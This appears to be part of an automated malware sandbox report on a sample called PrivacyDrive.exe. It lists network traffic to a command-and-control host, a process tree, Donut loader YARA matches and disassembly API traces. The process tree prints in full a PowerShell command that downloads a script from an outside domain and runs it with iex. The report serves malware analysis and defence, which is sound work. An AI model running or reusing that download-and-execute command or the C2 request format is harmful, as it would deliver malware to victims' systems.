                              2024-09-26 15:46:59 UTC | 1369 bytes | IN | Data Ascii: <input type="hidden" name="atok" value="fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" st
                              2024-09-26 15:46:59 UTC | 849 bytes | IN | Data Ascii: m:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a
                              2024-09-26 15:46:59 UTC | 5 bytes | IN | Data Ascii: 0\r\n\r\n (final zero-length chunk of the chunked response)


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                              6 | 192.168.2.4 | 49749 | 172.67.206.221 | 443 | 764 | C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Timestamp | Bytes transferred | Direction | Data
                              2024-09-26 15:46:59 UTC | 355 bytes | OUT | POST /api HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Cookie: __cf_mw_byp=fw93lyY_BMEJeILlolM3es0EfUXi8G49RoVHMxHuql0-1727365619-0.0.1.1-/api
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                              Content-Length: 49
                              Host: racedsuitreow.shop
                              2024-09-26 15:46:59 UTC | 49 bytes | OUT | Data Ascii: act=recive_message&ver=4.0&lid=yJEcaG--rui1222&j=
                              2024-09-26 15:47:00 UTC | 774 bytes | IN | HTTP/1.1 200 OK
                              Date: Thu, 26 Sep 2024 15:47:00 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: PHPSESSID=s261jmos7mlc3av1mdsrdi9udo; expires=Mon, 20 Jan 2025 09:33:39 GMT; Max-Age=9999999; path=/
                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                              Cache-Control: no-store, no-cache, must-revalidate
                              Pragma: no-cache
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Im40CtgK9%2FUaHet3NJeXDxA%2BdNrniTmLhHNPdIvD%2FxYHUvMzuKLiYvG5gA8CB6xKKRvVj4AI2D6Ge6ZlbziO0eEco45YL8mp0HQYyjfH25yOTPX5HUV9iy%2BozTkn4AUXIzIcZjo%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 8c9463d45fb042ca-EWR
                              2024-09-26 15:47:00 UTC | 15 bytes | IN | Data Ascii: a\r\nerror #D12\r\n (chunk of size 0xa carrying the body "error #D12")
                              2024-09-26 15:47:00 UTC | 5 bytes | IN | Data Ascii: 0\r\n\r\n (final zero-length chunk of the chunked response)



                              Target ID:0
                              Start time:11:46:23
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd /C ""PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text"
                              Imagebase:0x240000
                              File size:236'544 bytes
                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:1
                              Start time:11:46:23
                              Start date:26/09/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:11:46:24
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):true
                              Commandline:"PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
                              Imagebase:0x960000
                              File size:433'152 bytes
                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:11:46:27
                              Start date:26/09/2024
                              Path:C:\Windows\System32\svchost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                              Imagebase:0x7ff6eef20000
                              File size:55'320 bytes
                              MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:false

                              Target ID:4
                              Start time:11:46:36
                              Start date:26/09/2024
                              Path:C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
                              Imagebase:0x400000
                              File size:2'881'672 bytes
                              MD5 hash:80C2A36E9A14E3EDBA0B706D2433D9B8
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:8
                              Start time:11:46:47
                              Start date:26/09/2024
                              Path:C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
                              Imagebase:0x400000
                              File size:2'881'672 bytes
                              MD5 hash:80C2A36E9A14E3EDBA0B706D2433D9B8
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000008.00000002.2150163916.0000000000F70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                              Reputation:low
                              Has exited:true

                              Target ID:12
                              Start time:11:46:48
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1760
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:11:46:48
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1740
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:15
                              Start time:11:46:50
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1696
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:17
                              Start time:11:46:51
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 1716
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:19
                              Start time:11:46:59
                              Start date:26/09/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 1728
                              Imagebase:0x980000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true


                                Execution Graph

                                Execution Coverage:0.7%
                                Dynamic/Decrypted Code Coverage:70.4%
                                Signature Coverage:30.7%
                                Total number of Nodes:189
                                Total number of Limit Nodes:32
                                execution_graph: the node and edge listing is omitted here. API nodes appearing in the graph: GetVolumeInformationW, GetLastError, SetLastError, TlsGetValue, TlsSetValue, GetCurrentThreadId, GetCurrentProcessId, Sleep, GetPEB, CreateThread, CreateToolhelp32Snapshot, Thread32First, Wow64SuspendThread, CloseHandle, LoadLibraryA, FreeLibrary, VirtualAlloc, VirtualProtect, NtCreateSection, NtMapViewOfSection, LdrInitializeThunk, RtlAllocateHeap, RtlFreeHeap, LeaveCriticalSection, CoInitialize, CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, SysAllocString, GetInputState, ExitProcess.

                                Control-flow Graph

                                control_flow_graph for function 50e640-5102bc (executed/not-executed colouring and the per-block call listing are omitted here); Windows APIs reached from this function: LoadLibraryW, GetProcAddress, VirtualAlloc.
                                APIs
                                • LoadLibraryW.KERNEL32(?,-00000001C816EF8F,-D3472FE1,00000000,?,-37466A7C), ref: 0050EFD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0050F8DC
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressAllocLibraryLoadProcVirtual
                                • String ID: I\$5H\$5V\$=\$=6\$=]\$=h\$!J\$!5v\$!5{\$!=Q\$)=\\$1=7\$3=\$N)5X\$:5$l]
                                • API String ID: 4074058790-3398654432
                                • Opcode ID: 5cf1c075dd1c5804f0484755acad62fd2e52c2f1c2395c0f880e5a8e5b4e3f62
                                • Instruction ID: ee3a7cb5424bd764c10784c3ed0ff581881010bb31c488890e1eaacbe34f7dfd
                                • Opcode Fuzzy Hash: 5cf1c075dd1c5804f0484755acad62fd2e52c2f1c2395c0f880e5a8e5b4e3f62
                                • Instruction Fuzzy Hash: 5DD24B76954B20CFD758DFB6EC8696A3762F7B0304341B62ED403871E5CF38194AAAC5

                                Control-flow Graph

                                control_flow_graph for blocks 50e674-50e6c7 and 50e6d6-5102bc, with 50e6d1 calling 4d7d21 (executed/not-executed colouring and the per-block call listing are omitted here); Windows APIs reached from this function: LoadLibraryW, GetProcAddress, VirtualAlloc.
                                APIs
                                • LoadLibraryW.KERNEL32(?,-00000001C816EF8F,-D3472FE1,00000000,?,-37466A7C), ref: 0050EFD2
                                • GetProcAddress.KERNEL32(00000000), ref: 0050F8DC
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressAllocLibraryLoadProcVirtual
                                • String ID: I\$5H\$5V\$=\$=6\$=]\$=h\$!J\$!5v\$!5{\$!=Q\$)=\\$1=7\$3=\$N)5X\$:5$l]
                                • API String ID: 4074058790-3398654432
                                • Opcode ID: e851c25e3e48dfe5a46926cc7a2b28c99539beb22ae8fd77874ea49fb4427dbe
                                • Instruction ID: d2289b821f783aacf1f91394e5df425eff50f6776758f94baca2d9f2921533a3
                                • Opcode Fuzzy Hash: e851c25e3e48dfe5a46926cc7a2b28c99539beb22ae8fd77874ea49fb4427dbe
                                • Instruction Fuzzy Hash: 7ED24B76954B20CFD758DFBAEC8696A3762F7B0304341B62ED403871E5CF38194AAAC5

                                Control-flow Graph

                                APIs
                                • GetProcAddress.KERNEL32(00000000), ref: 0050F8DC
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressAllocProcVirtual
                                • String ID: =6\$=]\$=h\$!J\$!5{\$)=\\$1=7\$3=\$:5$l]
                                • API String ID: 2770133467-2676442670
                                • Opcode ID: 4c56733f69eaa6b33f9705d39bcb6a5dc64e2338d2ffb348a4e9b076d671747d
                                • Instruction ID: 327a959ee4ffdb57f71688f4b249be64711144f05ad95c8dd03decab71dfb643
                                • Opcode Fuzzy Hash: 4c56733f69eaa6b33f9705d39bcb6a5dc64e2338d2ffb348a4e9b076d671747d
                                • Instruction Fuzzy Hash: 9C825C77954B20CFC758DFBAEC8695A3762F7E0304342A62ED402971E5CF38194EAAC5
                                APIs
                                • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00FDC643
                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00FDC6EF
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?), ref: 00FDCA5A
                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 00FDCB0F
                                • VirtualProtect.KERNEL32(?,?,00000008,?), ref: 00FDCB2C
                                • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00FDCBD1
                                • VirtualProtect.KERNEL32(?,?,00000002,00000000), ref: 00FDCC06
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$ProtectSection$View$AllocCreate
                                • String ID:
                                • API String ID: 2664363762-0
                                • Opcode ID: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
                                • Instruction ID: 26bb833aecf02567d4292cd4c7da8ff9ab0c92b334022f9a2c5e5552716236d0
                                • Opcode Fuzzy Hash: 0b64ae62a9707750b83c9f98bbf6d7199bee7893939f3559e4f57fa99803780f
                                • Instruction Fuzzy Hash: 5B428F72A043029FDB24CF24CC44B6AB7EAAF84714F18492EF995DB341D774E941EB92

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: =]\$=h\$)=\\$1=7\$3=\$l]
                                • API String ID: 4275171209-3216202953
                                • Opcode ID: ebe4869e19d5f7c516b3a384fec4e1fdc3117d1933cf8fae32f719dbc3b3faac
                                • Instruction ID: 9a05f524823c9e390478221f60b4dbb571e86af1ee666c2076af2e1e642025c5
                                • Opcode Fuzzy Hash: ebe4869e19d5f7c516b3a384fec4e1fdc3117d1933cf8fae32f719dbc3b3faac
                                • Instruction Fuzzy Hash: DB221A72854B20CFD758DFB9EC96D6A3762F7E0304342A62ED403971E5CF38194AAAC5

                                Control-flow Graph

                                APIs
                                • VirtualAlloc.KERNEL32(-AB438275,0005D9EF,?,-650D102C,?,?,?,2D6F08F3), ref: 0050FF7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: =]\$=h\$)=\\$1=7\$3=\$l]
                                • API String ID: 4275171209-3216202953
                                • Opcode ID: 75132aa80ec677986a861b1b84a842cf09d0a9801579e7800dd8ad61ea67b34c
                                • Instruction ID: 98bcd29253916265840648f9ade71dd15fd9564f42f5f3c2623c35f94a07c134
                                • Opcode Fuzzy Hash: 75132aa80ec677986a861b1b84a842cf09d0a9801579e7800dd8ad61ea67b34c
                                • Instruction Fuzzy Hash: 36221A72854B20CFD758DFB9EC86D6A3762F7E0304342A62ED503971E5CF38194AAAC5

                                Control-flow Graph

                                control_flow_graph 1362 51af7b0-51af7f0 1363 51af7f2 1362->1363 1364 51af826-51af936 1362->1364 1365 51af800-51af824 call 51b1bc0 1363->1365 1366 51af938 1364->1366 1367 51af966-51af998 1364->1367 1365->1364 1371 51af940-51af964 call 51b1cc0 1366->1371 1368 51af99a 1367->1368 1369 51af9c9-51af9d8 call 51b0760 1367->1369 1372 51af9a0-51af9c7 call 51b1c40 1368->1372 1378 51af9dd-51af9e2 1369->1378 1371->1367 1372->1369 1380 51af9e8-51afa0d 1378->1380 1381 51afae4-51afae6 1378->1381 1383 51afa0f 1380->1383 1384 51afa36-51afa3f 1380->1384 1382 51afcc2-51afccc 1381->1382 1385 51afa10-51afa34 call 51b1d40 1383->1385 1386 51afa40-51afa4a 1384->1386 1385->1384 1387 51afa4c-51afa4f 1386->1387 1388 51afa51-51afa59 1386->1388 1387->1386 1387->1388 1390 51afa5f-51afa7c 1388->1390 1391 51afcb2-51afcbe call 51e3160 1388->1391 1393 51afa7e-51afa7f 1390->1393 1394 51afaa6-51afab1 1390->1394 1391->1382 1396 51afa80-51afaa4 call 51b1dc0 1393->1396 1397 51afaeb 1394->1397 1398 51afab3-51afab7 1394->1398 1396->1394 1400 51afaed-51afaef 1397->1400 1402 51afac7-51afacb 1398->1402 1403 51afcaa 1400->1403 1404 51afaf5-51afb36 1400->1404 1402->1403 1406 51afad1-51afad8 1402->1406 1403->1391 1407 51afb38 1404->1407 1408 51afb66-51afb71 1404->1408 1409 51afada-51afadc 1406->1409 1410 51afade 1406->1410 1411 51afb40-51afb64 call 51b1e50 1407->1411 1412 51afb73-51afb7b 1408->1412 1413 51afba4 1408->1413 1409->1410 1414 51afac0-51afac5 1410->1414 1415 51afae0-51afae2 1410->1415 1411->1408 1418 51afb87-51afb8b 1412->1418 1416 51afba6-51afba8 1413->1416 1414->1400 1414->1402 1415->1414 1416->1403 1419 51afbae-51afbd3 1416->1419 1418->1403 1421 51afb91-51afb98 1418->1421 1422 51afc06-51afc0d 1419->1422 1423 51afbd5 1419->1423 1424 51afb9a-51afb9c 1421->1424 1425 51afb9e 1421->1425 1427 51afc0f-51afc1c 1422->1427 1428 51afc40-51afc4c 1422->1428 1426 51afbe0-51afc04 call 51b1ed0 1423->1426 1424->1425 1429 51afb80-51afb85 1425->1429 1430 51afba0-51afba2 1425->1430 
1426->1422 1432 51afc27-51afc2b 1427->1432 1433 51afcd3-51afcd8 1428->1433 1429->1416 1429->1418 1430->1429 1432->1403 1435 51afc2d-51afc34 1432->1435 1433->1391 1436 51afc3a 1435->1436 1437 51afc36-51afc38 1435->1437 1438 51afc3c-51afc3e 1436->1438 1439 51afc20-51afc25 1436->1439 1437->1436 1438->1439 1439->1432 1440 51afc51-51afc53 1439->1440 1440->1403 1441 51afc55-51afc6b 1440->1441 1441->1433 1442 51afc6d-51afc6f 1441->1442 1443 51afc73-51afc76 1442->1443 1444 51afc78-51afc98 call 51b17c0 1443->1444 1445 51afccd 1443->1445 1448 51afc9a-51afca0 1444->1448 1449 51afca2-51afca8 1444->1449 1445->1433 1448->1443 1448->1449 1449->1433
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: 2$1.$2VbLUtXoIqa2pl0uSvd6B6CRPFFCp4FfUF1UfiX3kg8-1727365608-0.0.1.1-/api$6(>*$=:li$Ga!1$ZABC$IK$MSO
                                • API String ID: 0-703293956
                                • Opcode ID: 8e6c78eead6cdce8916548d87214fd1e2466242cc5dfe16290e2db02727c0ebd
                                • Instruction ID: f54ae8ac2b9862b0da7133ac4830c46d78114b6ceabc4f0b85a40ec0d227fced
                                • Opcode Fuzzy Hash: 8e6c78eead6cdce8916548d87214fd1e2466242cc5dfe16290e2db02727c0ebd
                                • Instruction Fuzzy Hash: D1D19BB920C3808BD312EF19C494A6FBBE1BF96644F180D1CE4D19B356D376D94ACB92

                                Control-flow Graph

                                control_flow_graph 1450 f80c6f-f80cb6 CreateToolhelp32Snapshot 1453 f80d8c-f80d8f 1450->1453 1454 f80cbc-f80cdd Thread32First 1450->1454 1455 f80d78-f80d8a CloseHandle 1454->1455 1456 f80ce3-f80ce9 1454->1456 1455->1453 1457 f80d58-f80d72 1456->1457 1458 f80ceb-f80cf1 1456->1458 1457->1455 1457->1456 1458->1457 1459 f80cf3-f80d12 1458->1459 1459->1457 1462 f80d14-f80d18 1459->1462 1463 f80d1a-f80d2e Wow64SuspendThread 1462->1463 1464 f80d30-f80d3f 1462->1464 1465 f80d44-f80d56 CloseHandle 1463->1465 1464->1465 1465->1457
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,00F807B5,?,00000001,?,81EC8B55,000000FF), ref: 00F80CAD
                                • Thread32First.KERNEL32(00000000,0000001C), ref: 00F80CD9
                                • Wow64SuspendThread.KERNEL32(00000000), ref: 00F80D2C
                                • CloseHandle.KERNEL32(00000000), ref: 00F80D56
                                • CloseHandle.KERNEL32(00000000), ref: 00F80D8A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateFirstSnapshotSuspendThreadThread32Toolhelp32Wow64
                                • String ID:
                                • API String ID: 2720937676-0
                                • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                • Instruction ID: 06c4034115f0a3ed69fca0106cad70a3f8664a1b41fdfe3747f613553170cefb
                                • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                • Instruction Fuzzy Hash: 0F410071A00108AFDB58DF98C890FEDB7B6EF88310F50C168EA159B7A4DE34AE45CB54

                                Control-flow Graph

                                control_flow_graph 1530 f80b1f-f80b76 GetPEB 1531 f80b81-f80b85 1530->1531 1532 f80b8b-f80b96 1531->1532 1533 f80c25-f80c2c 1531->1533 1534 f80b9c-f80bb3 1532->1534 1535 f80c20 1532->1535 1536 f80c37-f80c3b 1533->1536 1537 f80bd8-f80bf0 CreateThread 1534->1537 1538 f80bb5-f80bd6 1534->1538 1535->1531 1540 f80c4c-f80c53 1536->1540 1541 f80c3d-f80c4a 1536->1541 1545 f80bf4-f80bfc 1537->1545 1538->1545 1543 f80c5c-f80c61 1540->1543 1544 f80c55-f80c57 1540->1544 1541->1536 1544->1543 1545->1535 1547 f80bfe-f80c1b 1545->1547 1547->1535
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00F80BEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID: ,
                                • API String ID: 2422867632-3772416878
                                • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                • Instruction ID: 33ef80dc20ee9b4d76a97a08f04e5d2cd0581586a94a501bb0da34b32c5f70b1
                                • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
